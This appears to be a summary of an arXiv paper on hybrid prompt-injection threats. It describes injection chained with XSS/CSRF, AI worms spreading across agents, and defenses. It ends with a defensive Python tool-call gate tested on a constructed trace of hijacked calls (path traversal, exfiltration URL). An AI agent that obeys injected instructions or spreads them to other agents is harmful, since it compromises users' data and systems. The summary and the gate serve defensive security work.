arXiv — Prompt Injection 2.0: hybrid AI threats

AI relevance: The paper connects prompt injection with classic web exploits (XSS/CSRF) to explain how agentic systems amplify blended attacks.

  • The authors frame “Prompt Injection 2.0” as a hybrid threat model where LLM instruction hijacks pair with web-layer exploits.
  • They argue agentic workflows make exploitation more reliable by automating multi-step tool use once a prompt is compromised.
  • Attack examples include injection + XSS/CSRF chaining to bypass traditional web defenses in AI-integrated apps.
  • The paper emphasizes AI worms and multi-agent propagation as a plausible escalation path.
  • It highlights gaps in existing mitigations that focus on prompt filters without runtime isolation.
  • Proposed defenses combine prompt isolation, privilege separation, and runtime monitoring across tools and agents.
  • It calls for benchmarks that measure hybrid attack success, not just prompt-level jailbreak rates.

Why it matters

  • Hybrid attacks target the entire AI+web stack, so prompt filters alone won’t stop them.
  • Agentic automation can turn a single injection into multi-step compromise across systems.
  • Security teams need cross-layer testing that mirrors real AI app deployments.

What to do

  • Isolate tools and permissions: treat tool calls like privileged APIs with allowlists and scopes.
  • Test hybrid chains: combine prompt injection with web vulnerabilities in red-team suites.
  • Instrument runtime telemetry: monitor tool invocation patterns and anomalous data access.
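The first and third bullets in practice, as an added illustration rather than code from the paper: a small Python mediator (hypothetical tool names `fs.read`, `http.get`, and a constructed call trace) that gates every agent tool call against a per-agent allowlist and scope, records each verdict as telemetry, and derives anomaly flags from the recorded invocation pattern:

```python
from dataclasses import dataclass, field
from urllib.parse import urlparse
import posixpath
@dataclass
class ToolPolicy:
    allowed_tools: frozenset             # tools the agent may call at all
    fs_roots: tuple = ()                 # fs.read only under these directories
    http_hosts: frozenset = frozenset()  # http.get only to these hosts
@dataclass
class Mediator:
    policies: dict                              # agent name -> ToolPolicy
    events: list = field(default_factory=list)  # runtime telemetry, one record per call

    def _in_scope(self, pol, tool, args):
        if tool == "fs.read":
            path = posixpath.normpath(args.get("path", ""))  # collapse ../ before checking
            return any(path == r or path.startswith(r.rstrip("/") + "/") for r in pol.fs_roots)
        if tool == "http.get":
            return (urlparse(args.get("url", "")).hostname or "") in pol.http_hosts
        return True                             # tools without extra scope rules

    def invoke(self, agent, tool, args):  # gate like a privileged API: allowlist, then scope
        pol, verdict = self.policies.get(agent), "allowed"
        if pol is None or tool not in pol.allowed_tools:
            verdict = "denied:not-allowlisted"
        elif not self._in_scope(pol, tool, args):
            verdict = "denied:out-of-scope"
        self.events.append({"agent": agent, "tool": tool, "args": args, "verdict": verdict})
        return verdict

    def anomalies(self, max_denials=1):  # denial bursts, and a read immediately followed by a send
        flags, denied, prev = [], {}, {}
        for ev in self.events:
            a, tool = ev["agent"], ev["tool"]
            denied[a] = denied.get(a, 0) + (ev["verdict"] != "allowed")
            if denied[a] == max_denials + 1:
                flags.append((a, "denial-burst"))
            if (prev.get(a), tool) == ("fs.read", "http.get"):  # attempted, whether or not gated
                flags.append((a, "read-then-send"))
            prev[a] = tool
        return flags

def run_demo():
    med = Mediator({"summarizer": ToolPolicy(frozenset({"fs.read", "http.get"}),
                                            ("/data/public",), frozenset({"api.example.com"}))})
    calls = [("http.get", {"url": "https://api.example.com/summary"}),      # constructed trace:
             ("fs.read", {"path": "/data/public/report.txt"}),              # two benign calls,
             ("fs.read", {"path": "/data/public/../secrets/key"}),          # then two from a
             ("http.get", {"url": "https://untrusted.invalid/?d=report"})]  # hijacked prompt
    return [med.invoke("summarizer", t, a) for t, a in calls], med.anomalies()
```

The scope checks stop the two hijacked calls, and the telemetry still surfaces the attempted read-then-send sequence and the denial burst, which is the cross-layer signal a prompt filter alone would not produce.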

Sources